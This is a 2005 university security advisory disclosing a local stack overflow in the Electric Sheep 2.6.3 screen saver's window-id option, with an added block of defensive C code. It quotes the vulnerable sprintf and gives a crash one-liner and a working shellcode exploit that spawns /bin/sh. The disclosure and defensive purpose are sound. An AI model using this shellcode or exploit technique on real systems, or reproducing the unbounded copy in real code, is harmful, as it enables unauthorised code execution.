es263-windows-id.txt

Posted Dec 31, 2005
Authored by Daniel Guido, Michael Aiello | Site michaelaiello.com

Electric Sheep version 2.6.3 suffers from a stack overflow in the window-id parameter. Note that it is not setuid by default.

tags | advisory, overflow
systems | windows
SHA-256 | 637e767deb9f57a0e6465433adc14495207554e9f117a7669575c6eaa7b3f610

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Polytechnic University ISIS Security Advisory PUISIS10202005
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://isis.poly.edu
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
~ Application: Electric Sheep v2.6.3
~ Severity: Normal
~ Title: Electric Sheep window-id stack overflow
~ Date: October 20, 2005
~ ID: PUISIS10202005
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Summary
=======
Due to insufficient bounds checking, a lengthy window-id parameter can
cause a stack-based buffer overflow, allowing execution of arbitrary
code with the privileges of the invoking user. This could potentially be
used as a backdoor entry point.

Background
==========
"Electric Sheep is a free, open source screen saver run by thousands of
people all over the world. It can be installed on any ordinary PC or
Mac. When these computers "sleep", the screen saver comes on and the
computers communicate with each other by the internet to share the work
of creating morphing abstract animations known as "sheep".
http://electricsheep.org/

Description
===========
electricsheep.c, line 419:

default_background(char *more) {
    char ob[MAXBUF];
    char pbuf[MAXBUF];
    char qbuf[MAXBUF];

    if (nobg || (!on_root && !window_id)) return;
    if (more)
        sprintf(ob, "-merge -at 500,0 s.tif",
                splash_prefix, more);
    else
        ob[0] = 0;

    if (window_id)
        sprintf(qbuf, "-windowid %s", window_id); // no bounds checking on qbuf

Because window_id comes directly from the command line, a malicious
user can supply a window_id larger than MAXBUF and corrupt the
surrounding stack memory. The vulnerability can be seen by executing
the following command:

electricsheep -window-id `perl -e '{print "A"x"40000";}'`

Bad integer argument for the windowid option
Usage: xsetbg [global options] {[image options] image_name ...}
Type `xsetbg -help [option ...]' for information on a particular option, or
`xsetbg -help' to enter the interactive help facility.
subprocess failure: splash0, 256=1<<8+0
Segmentation fault
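As an added example (not code from the advisory or the Electric Sheep project), here is the bounded form of the qbuf formatting next to a check that rejects a malformed window id before it reaches any buffer. MAXBUF, the function names and the sample id 0x3a00007 are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAXBUF 1024   /* assumed here; electricsheep.c defines its own value */

/* Bounded replacement for sprintf(qbuf, "-windowid %s", window_id):
 * snprintf() stops at the buffer end and the caller learns about
 * truncation instead of getting a corrupted stack. 0 = ok, -1 = refused. */
static int format_windowid(const char *window_id, char *qbuf, size_t qsz) {
    int n = snprintf(qbuf, qsz, "-windowid %s", window_id);
    if (n < 0 || (size_t)n >= qsz) {
        if (qsz) qbuf[0] = '\0';
        return -1;
    }
    return 0;
}

/* xsetbg treats the window id as an integer, so accept only decimal digits
 * or a 0x-prefixed hex value, capped at 10 characters (enough for a
 * 32-bit X id). Anything else is rejected before it is ever formatted. */
static int valid_window_id(const char *s) {
    size_t i, len = s ? strlen(s) : 0;
    if (len == 0 || len > 10) return 0;
    if (s[0] == '0' && (s[1] == 'x' || s[1] == 'X')) {
        if (len == 2) return 0;
        for (i = 2; i < len; i++)
            if (!isxdigit((unsigned char)s[i])) return 0;
        return 1;
    }
    for (i = 0; i < len; i++)
        if (!isdigit((unsigned char)s[i])) return 0;
    return 1;
}

/* Constructs an argument longer than MAXBUF (the advisory's "A" x 40000,
 * scaled down) and reports whether the bounded formatter refuses it. */
static int overlong_is_refused(void) {
    char big[MAXBUF + 64], qbuf[MAXBUF];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return format_windowid(big, qbuf, sizeof qbuf) == -1 && qbuf[0] == '\0';
}

/* Formats a well-formed id (constructed sample) and returns the result. */
static const char *format_sample(void) {
    static char qbuf[MAXBUF];
    return format_windowid("0x3a00007", qbuf, sizeof qbuf) == 0 ? qbuf : "";
}
```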

An exploit spawning /bin/sh on SUSE Linux:

narain@(none):~/electricsheep-2.6.3> electricsheep -window-id `perl -
e '{print "\x90"x"200"; print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46
\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb
\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; print "B"x"532";print
"\x80\xc4\xfd\xbf"; print "C"x"39219";}'`

Bad integer argument for the windowid option
Usage: xsetbg [global options] {[image options] image_name ...}
Type `xsetbg -help [option ...]' for information on a particular option, or
`xsetbg -help' to enter the interactive help facility.
subprocess failure: splash0, 256=1<<8+0
sh-3.00$ whoami
narain
sh-3.00$

Impact
======
This local exploit of the sheep client does not pose a significant
threat, as electricsheep does not setuid(0). However, local exploits
may be used as mechanisms for subverting command execution once a
system has been compromised, or to create backdoors.

Workaround
==========
The vendor was notified on November 18, 2005. The vendor was extremely
responsive and cooperative regarding these security issues. All issues
are fixed in the CVS HEAD of Electric Sheep client development and will
be included in the next release.

About
=====
The Information Systems and Internet Security (ISIS) Laboratory is
an NSF funded laboratory designed to facilitate hands-on
experimentation and project work in issues related to information
security. It provides the focus for multidisciplinary research and
education in emerging areas of security. Polytechnic University, an
NSA Center of Academic Excellence in Information Assurance Education,
houses the lab.

This vulnerability was discovered during coursework performed for
"Penetration Testing & Vulnerability Analysis" offered at
Polytechnic University (http://www.poly.edu) during the Fall 2005
semester.

License
=======
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5

Authors
=======
Michael Aiello http://www.michaelaiello.com
Daniel Guido dguido@gmail.com

